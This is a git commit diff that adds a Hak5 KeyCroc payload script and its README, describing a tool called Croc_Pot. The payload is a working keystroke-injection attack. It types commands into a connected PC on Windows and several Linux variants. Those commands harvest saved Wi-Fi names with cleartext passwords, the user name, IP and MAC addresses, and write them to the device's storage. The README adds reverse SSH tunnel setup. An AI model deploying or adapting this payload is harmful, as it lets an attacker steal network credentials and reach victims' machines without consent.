commit
feb6ec1e01
File diff suppressed because it is too large
Load Diff
|
@ -0,0 +1,377 @@
|
|||
# Title: Croc_Pot Payload
|
||||
# Description: Start Croc_pot.sh bash script automatically, scan takes about 30-40 sec to start because of OS detection
|
||||
# This will collect some data off target PC
|
||||
# (ip address, current user name, pc host name, ssid and passwd, mac address)
|
||||
# save to tools/Croc_pot folder
|
||||
# Author: Spywill
|
||||
# Version: 1.3.1
|
||||
# Category: Key Croc
|
||||
|
||||
MATCH crocpot
|
||||
|
||||
#---> Edit KEYCROC_PASSWD_HERE
|
||||
CROC_PW=hak5croc
|
||||
|
||||
#---> Edit LINUX-PC_PASSWD_HERE
|
||||
PC_PW=LINUX
|
||||
|
||||
#---> Save keycroc passwd in temp folder
|
||||
#---> This is used for starting Reverse SSH Tunnel with Target PC
|
||||
echo "${CROC_PW}" >> /tmp/CPW.txt
|
||||
|
||||
#----Create Croc_Pot folders
|
||||
if [[ -d "/root/udisk/loot/Croc_Pot" && "/root/udisk/tools/Croc_Pot" ]]; then
|
||||
LED B
|
||||
else
|
||||
mkdir -p /root/udisk/loot/Croc_Pot /root/udisk/tools/Croc_Pot
|
||||
fi
|
||||
|
||||
#---> Payload variable/remove existing OS detection
|
||||
CROC_OS=/root/udisk/tools/Croc_Pot/Croc_OS.txt
|
||||
cat > ${CROC_OS}
|
||||
rm /root/udisk/tools/Croc_Pot/Croc_OS_Target.txt /root/udisk/tools/Croc_Pot/shark_ip.txt
|
||||
|
||||
#---> Enter ethernet mode for OS detection
|
||||
ATTACKMODE AUTO_ETHERNET
|
||||
LED ATTACK
|
||||
|
||||
#---> Keycroc built in functions to retrieve target PC Loot
|
||||
GET TARGET_OS
|
||||
GET TARGET_IP
|
||||
GET HOST_IP
|
||||
GET TARGET_HOSTNAME
|
||||
|
||||
#---> After OS detection case TARGET_OS value
|
||||
case $TARGET_OS in
|
||||
WINDOWS)
|
||||
LED R
|
||||
#---> Enter Storage mode on keycroc
|
||||
ATTACKMODE HID STORAGE
|
||||
sleep 1
|
||||
#---> Start windows powershell
|
||||
Q GUI r
|
||||
sleep 1
|
||||
Q STRING "powershell"
|
||||
Q ENTER
|
||||
sleep 5
|
||||
#---> Place keycroc usb drive into variable
|
||||
Q STRING "\$Croc = (gwmi win32_volume -f 'label=\"KeyCroc\"' | Select-Object -ExpandProperty DriveLetter)"
|
||||
Q ENTER
|
||||
sleep 1
|
||||
#---> Retrieve target PC user name & save to tools/Croc_Pot/Croc_OS_Target.txt
|
||||
Q STRING "\$env:UserName | Format-Table -AutoSize | out-file -encoding UTF8 \"\$Croc\tools\Croc_Pot\Croc_OS_Target.txt\" -noclobber -append"
|
||||
Q ENTER
|
||||
sleep 1
|
||||
#---> Retrieve target PC IP address & save to tools/Croc_Pot/Croc_OS_Target.txt
|
||||
Q STRING "Get-CimInstance -Class Win32_NetworkAdapterConfiguration -Filter IPEnabled=\$true | Select-Object -ExpandProperty IPAddress | Format-Table -AutoSize | out-file -encoding UTF8 \"\$Croc\tools\Croc_Pot\Croc_OS_Target.txt\" -noclobber -append"
|
||||
Q ENTER
|
||||
sleep 1
|
||||
#---> Retrieve target PC SSID/PASSWD & save to tools/Croc_Pot/Croc_OS_Target.txt
|
||||
Q STRING "(netsh wlan show networks) | Select-String \"\:(.+)\$\" | % {\$name=\$_.Matches.Groups[1].Value.Trim(); \$_} | %{(netsh wlan show profile name=\"\$name\" key=clear)} | Select-String \"Key Content\W+\:(.+)\$\" | % {\$pass=\$_.Matches.Groups[1].Value.Trim(); \$_} | %{[PSCustomObject]@{ PROFILE_NAME=\$name;PASSWORD=\$pass }} | out-file -encoding UTF8 \"\$Croc\tools\Croc_Pot\Croc_OS_Target.txt\" -noclobber -append"
|
||||
Q ENTER
|
||||
sleep 2
|
||||
#---> Retrieve target PC MAC address & save to tools/Croc_Pot/Croc_OS_Target.txt
|
||||
Q STRING "wmic nic where PhysicalAdapter=True get MACAddress,Name | Format-Table -AutoSize | out-file -encoding UTF8 \"\$Croc\tools\Croc_Pot\Croc_OS_Target.txt\" -noclobber -append"
|
||||
Q ENTER
|
||||
sleep 3
|
||||
#---> Retrieve Shark Jack IP if connected to local network as target PC & save to tools/Croc_Pot/shark_ip.txt
|
||||
Q STRING "[System.Net.Dns]::GetHostAddresses(\"shark.lan\")[0].IPAddressToString | Format-Table -AutoSize | out-file -encoding UTF8 \"\$Croc\tools\Croc_Pot\shark_ip.txt\" -noclobber -append"
|
||||
Q ENTER
|
||||
sleep 3
|
||||
#---> Retrieve packet squirrel MAC address if connected to local network as target PC & save to tools/Croc_Pot/squirrel_mac.txt
|
||||
Q STRING "arp -a 172.16.32.1 | Select-String '([0-9a-f]{2}-){5}[0-9a-f]{2}' | Select-Object -Expand Matches | Select-Object -Expand Value | out-file -encoding UTF8 \"\$Croc\tools\Croc_Pot\squirrel_mac.txt\""
|
||||
Q ENTER
|
||||
sleep 2
|
||||
#---> Retrieve Lan turtle MAC address if connected to local network as target PC & save to tools/Croc_Pot/turtle_mac.txt
|
||||
Q STRING "arp -a 172.16.84.1 | Select-String '([0-9a-f]{2}-){5}[0-9a-f]{2}' | Select-Object -Expand Matches | Select-Object -Expand Value | out-file -encoding UTF8 \"\$Croc\tools\Croc_Pot\turtle_mac.txt\""
|
||||
Q ENTER
|
||||
sleep 2
|
||||
#---> Retrieve Bash Bunny MAC address if connected to local network as target PC ensure bunny is connected to network & save to tools/Croc_Pot/bunny_mac.txt
|
||||
Q STRING "arp -a 172.16.64.1 | Select-String '([0-9a-f]{2}-){5}[0-9a-f]{2}' | Select-Object -Expand Matches | Select-Object -Expand Value | out-file -encoding UTF8 \"\$Croc\tools\Croc_Pot\bunny_mac.txt\""
|
||||
Q ENTER
|
||||
sleep 2
|
||||
#---> Return back to ATTACKMODE HID mode
|
||||
ATTACKMODE HID
|
||||
sleep 1
|
||||
#---> Start SSH session with target PC
|
||||
Q STRING "ssh root@$(ifconfig wlan0 | grep "inet addr" | awk {'print $2'} | cut -c 6-)"
|
||||
Q ENTER
|
||||
sleep 2
|
||||
#---> Entering keycroc passwd
|
||||
Q STRING "${CROC_PW}"
|
||||
Q ENTER
|
||||
sleep 2
|
||||
#---> Save Keycroc built in functions to tools/Croc_Pot/Croc_OS.txt
|
||||
echo "$TARGET_OS" >> ${CROC_OS}
|
||||
echo "$TARGET_IP" >> ${CROC_OS}
|
||||
echo "$TARGET_HOSTNAME" >> ${CROC_OS}
|
||||
echo "$HOST_IP" >> ${CROC_OS}
|
||||
#---> Edit with sed to remove powershell output "r" endlines & remove first character
|
||||
$(sed -i 's/\r//g' /root/udisk/tools/Croc_Pot/Croc_OS_Target.txt /root/udisk/tools/Croc_Pot/shark_ip.txt /root/udisk/tools/Croc_Pot/squirrel_mac.txt /root/udisk/tools/Croc_Pot/turtle_mac.txt /root/udisk/tools/Croc_Pot/bunny_mac.txt)
|
||||
$(sed -i '0,/./s/^.//' /root/udisk/tools/Croc_Pot/Croc_OS_Target.txt /root/udisk/tools/Croc_Pot/shark_ip.txt /root/udisk/tools/Croc_Pot/squirrel_mac.txt /root/udisk/tools/Croc_Pot/turtle_mac.txt /root/udisk/tools/Croc_Pot/bunny_mac.txt)
|
||||
#---> Starting Croc_Pot
|
||||
Q STRING "/root/udisk/tools/Croc_Pot.sh"
|
||||
Q ENTER ;;
|
||||
MACOS)
|
||||
#---> Return back to ATTACKMODE HID mode
|
||||
ATTACKMODE HID
|
||||
LED G
|
||||
sleep 1
|
||||
#---> Start mac os terminal
|
||||
Q GUI-SPACE
|
||||
sleep 1
|
||||
Q STRING "terminal"
|
||||
Q ENTER
|
||||
sleep 2
|
||||
#---> Start SSH session with target PC
|
||||
Q STRING "ssh root@$(ifconfig wlan0 | grep "inet addr" | awk {'print $2'} | cut -c 6-)"
|
||||
Q ENTER
|
||||
sleep 2
|
||||
#---> Entering keycroc passwd
|
||||
Q STRING "${CROC_PW}"
|
||||
Q ENTER
|
||||
sleep 1
|
||||
#---> Save Keycroc built in functions to tools/Croc_Pot/Croc_OS.txt
|
||||
echo "$TARGET_OS" >> ${CROC_OS}
|
||||
echo "$TARGET_IP" >> ${CROC_OS}
|
||||
echo "$TARGET_HOSTNAME" >> ${CROC_OS}
|
||||
echo "$HOST_IP" >> ${CROC_OS}
|
||||
#---> Starting Croc_Pot
|
||||
Q STRING "/root/udisk/tools/Croc_Pot.sh"
|
||||
Q ENTER ;;
|
||||
LINUX)
|
||||
#---> Enter Storage mode on keycroc
|
||||
ATTACKMODE HID STORAGE
|
||||
LED B
|
||||
sleep 3
|
||||
#---> After TARGET_HOSTNAME scan case TARGET_HOSTNAME value
|
||||
case $TARGET_HOSTNAME in
|
||||
raspberrypi)
|
||||
#---> Start Raspberry pi 4 terminal -->gnome-terminal installed<--
|
||||
Q GUI d
|
||||
sleep 1
|
||||
Q STRING "terminal"
|
||||
Q ENTER
|
||||
Q ENTER
|
||||
sleep 2
|
||||
#---> Place keycroc usb drive into variable
|
||||
Q STRING "PC_USER=/media/\$(whoami)/KeyCroc/tools/Croc_Pot/Croc_OS_Target.txt"
|
||||
Q ENTER
|
||||
#---> Retrieve target PC user name & save to tools/Croc_Pot/Croc_OS_Target.txt
|
||||
Q STRING "whoami | tee \${PC_USER}"
|
||||
Q ENTER
|
||||
sleep 1
|
||||
#---> Retrieve target PC IP address & save to tools/Croc_Pot/Croc_OS_Target.txt
|
||||
Q STRING "ip -4 -o addr show wlan0 | awk '{print \$4}' | cut -d \"/\" -f 1 | tee -a \${PC_USER} && ip -4 -o addr show eth0 | awk '{print \$4}' | cut -d \"/\" -f 1 | tee -a \${PC_USER} && ip -4 -o addr show eth1 | awk '{print \$4}' | cut -d \"/\" -f 1 | tee -a \${PC_USER} && echo '' >> \${PC_USER}"
|
||||
Q ENTER
|
||||
sleep 1
|
||||
#---> Retrieve target PC SSID/PASSWD & save to tools/Croc_Pot/Croc_OS_Target.txt
|
||||
Q STRING "sed -n '/ssid\|psk/,+1p' /etc/wpa_supplicant/wpa_supplicant.conf | sed -e 's/[\"]//g' | tee -a \${PC_USER}"
|
||||
Q ENTER
|
||||
sleep 1
|
||||
#---> Retrieve target PC MAC address & save to tools/Croc_Pot/Croc_OS_Target.txt
|
||||
Q STRING "ip -o link | awk '\$2 != \"lo:\" {print \$2, \$(NF-2)}' | tee -a \${PC_USER}"
|
||||
Q ENTER
|
||||
sleep 2
|
||||
#---> Retrieve Shark Jack IP if connected to local network as target PC & save to tools/Croc_Pot/shark_ip.txt
|
||||
Q STRING "ping -c1 -w1 shark.lan | grep PING | sed -e \"s/).*//\" | sed -e \"s/.*(//\" | tee /media/\$(whoami)/KeyCroc/tools/Croc_Pot/shark_ip.txt"
|
||||
Q ENTER
|
||||
sleep 2
|
||||
#---> Retrieve packet squirrel MAC address if connected to local network as target PC & save to tools/Croc_Pot/squirrel_mac.txt
|
||||
Q STRING "arp squirrel.lan | awk '/'squirrel.lan'/{print \$3}' | sed -e 's/HWaddress//g' | tee /media/\$(whoami)/KeyCroc/tools/Croc_Pot/squirrel_mac.txt"
|
||||
Q ENTER
|
||||
sleep 2
|
||||
#---> Retrieve Lan turtle MAC address if connected to local network as target PC & save to tools/Croc_Pot/turtle_mac.txt
|
||||
Q STRING "arp 172.16.84.1 | awk '/'172.16.84.1'/{print \$3}' | sed -e 's/HWaddress//g' | tee /media/\$(whoami)/KeyCroc/tools/Croc_Pot/turtle_mac.txt"
|
||||
Q ENTER
|
||||
sleep 2
|
||||
#---> Retrieve Bash Bunny MAC address if connected to local network as target PC ensure bunny is connected to network & save to tools/Croc_Pot/bunny_mac.txt
|
||||
Q STRING "arp 172.16.64.1 | awk '/'172.16.64.1'/{print \$3}' | sed -e 's/HWaddress//g' | tee /media/\$(whoami)/KeyCroc/tools/Croc_Pot/bunny_mac.txt"
|
||||
Q ENTER
|
||||
sleep 2
|
||||
#---> Return back to ATTACKMODE HID mode
|
||||
ATTACKMODE HID
|
||||
sleep 1
|
||||
#---> Start SSH session with target PC
|
||||
Q STRING "ssh root@$(ifconfig wlan0 | grep "inet addr" | awk {'print $2'} | cut -c 6-)"
|
||||
Q ENTER
|
||||
sleep 2
|
||||
#---> Entering keycroc passwd
|
||||
Q STRING "${CROC_PW}"
|
||||
Q ENTER
|
||||
#---> Save Keycroc built in functions to tools/Croc_Pot/Croc_OS.txt
|
||||
echo "$TARGET_OS" | tee -a ${CROC_OS}
|
||||
echo "$TARGET_IP" | tee -a ${CROC_OS}
|
||||
echo "$TARGET_HOSTNAME" | tee -a ${CROC_OS}
|
||||
echo "$HOST_IP" | tee -a ${CROC_OS}
|
||||
#---> Starting Croc_Pot
|
||||
Q STRING "/root/udisk/tools/Croc_Pot.sh"
|
||||
Q ENTER ;;
|
||||
parrot)
|
||||
#---> Start mate-terminal -->Parrot OS<--
|
||||
Q ALT F2
|
||||
sleep 1
|
||||
Q STRING "mate-terminal"
|
||||
Q ENTER
|
||||
sleep 1
|
||||
#---> Create keycroc directory
|
||||
Q STRING "sudo mkdir /media/\$(whoami)/KeyCroc/"
|
||||
Q ENTER
|
||||
#---> Entering Linux passwd
|
||||
Q STRING "${PC_PW}"
|
||||
Q ENTER
|
||||
sleep 1
|
||||
#---> Mount keycroc usb drive to target pc
|
||||
Q STRING "sudo mount /dev/sdd /media/\$(whoami)/KeyCroc/ -o rw,users,umask=0"
|
||||
Q ENTER
|
||||
sleep 1
|
||||
#---> Make KeyCroc folder executable
|
||||
Q STRING "sudo chmod 777 /media/\$(whoami)/KeyCroc/"
|
||||
Q ENTER
|
||||
sleep 1
|
||||
#---> Place keycroc usb drive into variable
|
||||
Q STRING "PC_USER=/media/\$(whoami)/KeyCroc/tools/Croc_Pot/Croc_OS_Target.txt"
|
||||
Q ENTER
|
||||
#---> Retrieve target PC user name & save to tools/Croc_Pot/Croc_OS_Target.txt
|
||||
Q STRING "whoami | tee \${PC_USER}"
|
||||
Q ENTER
|
||||
sleep 1
|
||||
#---> Retrieve target PC IP address & save to tools/Croc_Pot/Croc_OS_Target.txt
|
||||
Q STRING "ip -4 -o addr show wlan0 | awk '{print \$4}' | cut -d \"/\" -f 1 | tee -a \${PC_USER} && ip -4 -o addr show eth0 | awk '{print \$4}' | cut -d \"/\" -f 1 | tee -a \${PC_USER} && ip -4 -o addr show eth1 | awk '{print \$4}' | cut -d \"/\" -f 1 | tee -a \${PC_USER} && echo '' >> \${PC_USER}"
|
||||
Q ENTER
|
||||
sleep 1
|
||||
#---> Retrieve target PC SSID/PASSWD & save to tools/Croc_Pot/Croc_OS_Target.txt
|
||||
Q STRING "sudo grep -r '^psk=' /etc/NetworkManager/system-connections/ | sed -E -e 's/[/]//g' -e 's/etc//g' -e 's/NetworkManagersystem-connections//g' -e 's/.nmconnection:psk//g' | tee -a \${PC_USER}"
|
||||
Q ENTER
|
||||
sleep 1
|
||||
#---> Retrieve target PC MAC address & save to tools/Croc_Pot/Croc_OS_Target.txt
|
||||
Q STRING "ip -o link | awk '\$2 != \"lo:\" {print \$2, \$(NF-2)}' | tee -a \${PC_USER}"
|
||||
Q ENTER
|
||||
sleep 1
|
||||
#---> Retrieve Shark Jack IP if connected to local network as target PC & save to tools/Croc_Pot/shark_ip.txt
|
||||
Q STRING "ping -c1 -w1 shark.lan | grep PING | sed -e \"s/).*//\" | sed -e \"s/.*(//\" | tee /media/\$(whoami)/KeyCroc/tools/Croc_Pot/shark_ip.txt"
|
||||
Q ENTER
|
||||
sleep 5
|
||||
#---> Retrieve packet squirrel MAC address if connected to local network as target PC & save to tools/Croc_Pot/squirrel_mac.txt
|
||||
Q STRING "arp squirrel.lan | awk '/'squirrel.lan'/{print \$3}' | sed -e 's/HWaddress//g' | tee /media/\$(whoami)/KeyCroc/tools/Croc_Pot/squirrel_mac.txt"
|
||||
Q ENTER
|
||||
sleep 2
|
||||
#---> Retrieve Lan turtle MAC address if connected to local network as target PC & save to tools/Croc_Pot/turtle_mac.txt
|
||||
Q STRING "arp 172.16.84.1 | awk '/'172.16.84.1'/{print \$3}' | sed -e 's/HWaddress//g' | tee /media/\$(whoami)/KeyCroc/tools/Croc_Pot/turtle_mac.txt"
|
||||
Q ENTER
|
||||
sleep 2
|
||||
#---> Retrieve Bash Bunny MAC address if connected to local network as target PC ensure bunny is connected to network & save to tools/Croc_Pot/bunny_mac.txt
|
||||
Q STRING "arp 172.16.64.1 | awk '/'172.16.64.1'/{print \$3}' | sed -e 's/HWaddress//g' | tee /media/\$(whoami)/KeyCroc/tools/Croc_Pot/bunny_mac.txt"
|
||||
Q ENTER
|
||||
sleep 2
|
||||
#---> Unmount keycroc usb drive
|
||||
Q STRING "sudo umount /media/\$(whoami)/KeyCroc/"
|
||||
Q ENTER
|
||||
sleep 1
|
||||
#---> Return back to ATTACKMODE HID mode
|
||||
ATTACKMODE HID
|
||||
#---> Remove keycroc directory off target pc
|
||||
Q STRING "sudo rmdir /media/\$(whoami)/KeyCroc/"
|
||||
Q ENTER
|
||||
sleep 2
|
||||
#---> Start SSH session with target PC
|
||||
Q STRING "ssh root@$(ifconfig wlan0 | grep "inet addr" | awk {'print $2'} | cut -c 6-)"
|
||||
Q ENTER
|
||||
sleep 1
|
||||
#---> Entering keycroc passwd
|
||||
Q STRING "${CROC_PW}"
|
||||
Q ENTER
|
||||
#---> Save Keycroc built in functions to tools/Croc_Pot/Croc_OS.txt
|
||||
echo "$TARGET_OS" | tee -a ${CROC_OS}
|
||||
echo "$TARGET_IP" | tee -a ${CROC_OS}
|
||||
echo "$TARGET_HOSTNAME" | tee -a ${CROC_OS}
|
||||
echo "$HOST_IP" | tee -a ${CROC_OS}
|
||||
#---> Starting Croc_Pot
|
||||
Q STRING "/root/udisk/tools/Croc_Pot.sh"
|
||||
Q ENTER ;;
|
||||
*)
|
||||
#---> Start linux distributions terminal xterm
|
||||
#---> Unsure of which linux distribution this will work on
|
||||
Q ALT F2
|
||||
sleep 1
|
||||
Q STRING "xterm"
|
||||
Q ENTER
|
||||
sleep 1
|
||||
#---> Create keycroc directory
|
||||
Q STRING "sudo mkdir /media/\$(whoami)/KeyCroc/"
|
||||
Q ENTER
|
||||
#---> Entering Linux passwd
|
||||
Q STRING "${PC_PW}"
|
||||
Q ENTER
|
||||
sleep 1
|
||||
#---> Mount keycroc usb drive to target pc
|
||||
Q STRING "sudo mount /dev/sdd /media/\$(whoami)/KeyCroc/ -o rw,users,umask=0"
|
||||
Q ENTER
|
||||
sleep 1
|
||||
#---> Make KeyCroc folder executable
|
||||
Q STRING "sudo chmod 777 /media/\$(whoami)/KeyCroc/"
|
||||
Q ENTER
|
||||
sleep 1
|
||||
#---> Place keycroc usb drive into variable
|
||||
Q STRING "PC_USER=/media/\$(whoami)/KeyCroc/tools/Croc_Pot/Croc_OS_Target.txt"
|
||||
Q ENTER
|
||||
#---> Retrieve target PC user name & save to tools/Croc_Pot/Croc_OS_Target.txt
|
||||
Q STRING "whoami | tee \${PC_USER}"
|
||||
Q ENTER
|
||||
sleep 1
|
||||
#---> Retrieve target PC IP address & save to tools/Croc_Pot/Croc_OS_Target.txt
|
||||
Q STRING "ip -4 -o addr show wlan0 | awk '{print \$4}' | cut -d \"/\" -f 1 | tee -a \${PC_USER} && ip -4 -o addr show eth0 | awk '{print \$4}' | cut -d \"/\" -f 1 | tee -a \${PC_USER} && ip -4 -o addr show eth1 | awk '{print \$4}' | cut -d \"/\" -f 1 | tee -a \${PC_USER} && echo '' >> \${PC_USER}"
|
||||
Q ENTER
|
||||
sleep 1
|
||||
#---> Retrieve target PC SSID/PASSWD & save to tools/Croc_Pot/Croc_OS_Target.txt
|
||||
Q STRING "sudo grep -r '^psk=' /etc/NetworkManager/system-connections/ | sed -E -e 's/[/]//g' -e 's/etc//g' -e 's/NetworkManagersystem-connections//g' -e 's/.nmconnection:psk//g' | tee -a \${PC_USER}"
|
||||
Q ENTER
|
||||
sleep 1
|
||||
#---> Retrieve target PC MAC address & save to tools/Croc_Pot/Croc_OS_Target.txt
|
||||
Q STRING "ip -o link | awk '\$2 != \"lo:\" {print \$2, \$(NF-2)}' | tee -a \${PC_USER}"
|
||||
Q ENTER
|
||||
sleep 1
|
||||
#---> Retrieve Shark Jack IP if connected to local network as target PC & save to tools/Croc_Pot/shark_ip.txt
|
||||
Q STRING "ping -c1 -w1 shark.lan | grep PING | sed -e \"s/).*//\" | sed -e \"s/.*(//\" | tee /media/\$(whoami)/KeyCroc/tools/Croc_Pot/shark_ip.txt"
|
||||
Q ENTER
|
||||
sleep 5
|
||||
#---> Retrieve packet squirrel MAC address if connected to local network as target PC & save to tools/Croc_Pot/squirrel_mac.txt
|
||||
Q STRING "arp squirrel.lan | awk '/'squirrel.lan'/{print \$3}' | sed -e 's/HWaddress//g' | tee /media/\$(whoami)/KeyCroc/tools/Croc_Pot/squirrel_mac.txt"
|
||||
Q ENTER
|
||||
sleep 2
|
||||
#---> Retrieve Lan turtle MAC address if connected to local network as target PC & save to tools/Croc_Pot/turtle_mac.txt
|
||||
Q STRING "arp 172.16.84.1 | awk '/'172.16.84.1'/{print \$3}' | sed -e 's/HWaddress//g' | tee /media/\$(whoami)/KeyCroc/tools/Croc_Pot/turtle_mac.txt"
|
||||
Q ENTER
|
||||
sleep 2
|
||||
#---> Retrieve Bash Bunny MAC address if connected to local network as target PC ensure bunny is connected to network & save to tools/Croc_Pot/bunny_mac.txt
|
||||
Q STRING "arp 172.16.64.1 | awk '/'172.16.64.1'/{print \$3}' | sed -e 's/HWaddress//g' | tee /media/\$(whoami)/KeyCroc/tools/Croc_Pot/bunny_mac.txt"
|
||||
Q ENTER
|
||||
sleep 2
|
||||
#---> Unmount keycroc usb drive
|
||||
Q STRING "sudo umount /media/\$(whoami)/KeyCroc/"
|
||||
Q ENTER
|
||||
sleep 1
|
||||
#---> Return back to ATTACKMODE HID mode
|
||||
ATTACKMODE HID
|
||||
#---> Remove keycroc directory off target pc
|
||||
Q STRING "sudo rmdir /media/\$(whoami)/KeyCroc/"
|
||||
Q ENTER
|
||||
sleep 2
|
||||
#---> Start SSH session with target PC
|
||||
Q STRING "ssh root@$(ifconfig wlan0 | grep "inet addr" | awk {'print $2'} | cut -c 6-)"
|
||||
Q ENTER
|
||||
sleep 1
|
||||
#---> Entering keycroc passwd
|
||||
Q STRING "${CROC_PW}"
|
||||
Q ENTER
|
||||
#---> Save Keycroc built in functions to tools/Croc_Pot/Croc_OS.txt
|
||||
echo "$TARGET_OS" | tee -a ${CROC_OS}
|
||||
echo "$TARGET_IP" | tee -a ${CROC_OS}
|
||||
echo "$TARGET_HOSTNAME" | tee -a ${CROC_OS}
|
||||
echo "$HOST_IP" | tee -a ${CROC_OS}
|
||||
#---> Starting Croc_Pot
|
||||
Q STRING "/root/udisk/tools/Croc_Pot.sh"
|
||||
Q ENTER ;;
|
||||
esac
|
||||
;;
|
||||
esac
|
|
@ -0,0 +1,68 @@
|
|||
# Croc_Pot
|
||||
|
||||
## INTRODUCTION :
|
||||
- This project is developed for the HAK5 KeyCroc (Croc_Pot in development and testing)
|
||||
|
||||
* **Croc_Pot_Payload.txt**
|
||||
- Will start OS detection scan to see what OS the keycroc is pluged into (usb), collect some data off the target pc, automatically start an SSH session with connected target pc (wifi) and start Croc_Pot script
|
||||
- Ensure your keycroc is connected to the target pc wifi first before running **crocpot** If you do not have the target pc wifi credentials Croc_Pot has a payload to get you online (payload called getonline working on windows and Raspberry pi in development for linux version)
|
||||
|
||||
* **Croc_Pot.sh**
|
||||
- This project is to automate some commands for the keycroc for quicker setup, install payloads, remotely connect to keycroc, nmap tcpdump target pc scan, edited files on your keycroc, send e-mail from your keycroc, SSH to hak5 gear, run hak5 cloud C2 on keycroc, status of your keycroc, and more
|
||||
|
||||
* **TESTED ON**
|
||||
- Windows 10
|
||||
- Raspberry pi 4 with gnome-terminal installed
|
||||
- linux parrot os
|
||||
- Sorry no support for MAC OS
|
||||
|
||||
## INSTALLATION :
|
||||
|
||||
* Two file to this script
|
||||
- Will need to enter arming mode on your keycroc to install files.
|
||||
- First file is called **Croc_Pot.sh** Place this in the KeyCroc **tools folder**.
|
||||
- Second file is called **Croc_Pot_Payload.txt** Place this in the KeyCroc **payload folder**.
|
||||
- Edited the Croc_Pot_Payload.txt file for your keycroc passwd. default is (hak5croc)
|
||||
- Ensure your KeyCroc is connected (wifi) to the same local network as the target pc
|
||||
|
||||
## STARTING CROC_POT :
|
||||
|
||||
- First way to start Croc_Pot.sh is ssh into your keycroc and type **/root/udisk/tools/Croc_Pot.sh**.
|
||||
- Second way to start Croc_Pot.sh is type in anywhere **crocpot** this will start Croc_Pot.sh script automatically.
|
||||
- It is recommended to start Croc_Pot.sh script with typing in **crocpot** as this payload will collect some data off the target pc. Some of the info that it will collect will be Target pc (ip address, current user name, pc host name, ssid and passwd, mac address), This info will be used in the Croc_Pot.sh script.
|
||||
- **NOTE:** When running **crocpot** scan takes about 30-40 sec to start because of OS detection then Croc_Pot will start.
|
||||
|
||||
## SSH MENU :
|
||||
|
||||
### SSH TO HAK5 GEAR
|
||||
* Ensure all hak5 gear is connected to the same local network as your keycroc
|
||||
- Recommended to setup ssh PUBLIC AND PRIVATE KEY to each of your hak5 gear, SSH to your gear Without Password
|
||||
- SSH keycroc to Bash Bunny setup, first ensure your bash bunny has internet connection and connected to the same pc as your Keycroc, (bash bunny internet setup can be found at docs.hak5.org), Croc_Pot.sh will create a payload for your bash bunny, this file will be saved on your keycroc at tools/Croc_Pot/Bunny_Payload_Shell then copy this file to one of the payload switches on your bash bunny this is to start Reverse SSH Tunnel to keycroc.
|
||||
|
||||
### CREATE PUBLIC AND PRIVATE KEY
|
||||
* Perform SSH Login Without Password Using ssh-keygen & ssh-copy-id
|
||||
* Step 1: Create public and private keys using ssh-key-gen on local-host
|
||||
- jsmith@local-host$ **Note: You are on local-host here**
|
||||
- jsmith@local-host$ **ssh-keygen**
|
||||
- [Press enter key]
|
||||
* Step 2: Copy the public key to remote-host using ssh-copy-id
|
||||
- jsmith@local-host$ **ssh-copy-id -i ~/.ssh/id_rsa.pub username@remote-host-ip**
|
||||
- jsmith@remote-host's password:
|
||||
* Step 3: Login to remote-host without entering the password
|
||||
-jsmith@local-host$ **ssh username@remote-host-ip**
|
||||
* The above 3 simple steps should get the job done in most cases.
|
||||
|
||||
### Setup Reverse SSH Tunnel
|
||||
- Reverse SSH is a technique that can be used to access systems (that are behind a firewall) from the outside world.
|
||||
- Here is the command for remote server side
|
||||
- **ssh -fN -R 7000:localhost:22 username@your-Machine-ipaddress**
|
||||
- Now do an ssh connection request from your machine to your own machine at port 7000:
|
||||
- **ssh username@localhost -p 7000**
|
||||
- Here, though it may seem like you are doing ssh on localhost but your request would be forwarded to remote host. So, you should use your account ? username ? on remote server and when prompted for password, enter the corresponding password.
|
||||
|
||||
### Screenshot
|
||||
![Screenshot from 2021-08-12 07-54-07](https://user-images.githubusercontent.com/71735542/129192585-d0933663-748a-4000-9102-6e1ceb4a851c.png)
|
||||
![Screenshot from 2021-08-12 07-57-38](https://user-images.githubusercontent.com/71735542/129192913-8b880ee7-31f3-41ba-ac6b-59188e594460.png)
|
||||
![Screenshot from 2021-08-12 08-00-12](https://user-images.githubusercontent.com/71735542/129193161-60bea2b4-99f5-4781-8a8c-dbd7d4b3d27f.png)
|
||||
![Screenshot from 2021-08-12 08-03-59](https://user-images.githubusercontent.com/71735542/129193656-fbfcbc3c-207b-4555-be22-32a66cbe9aea.png)
|
||||
|
Loading…
Reference in New Issue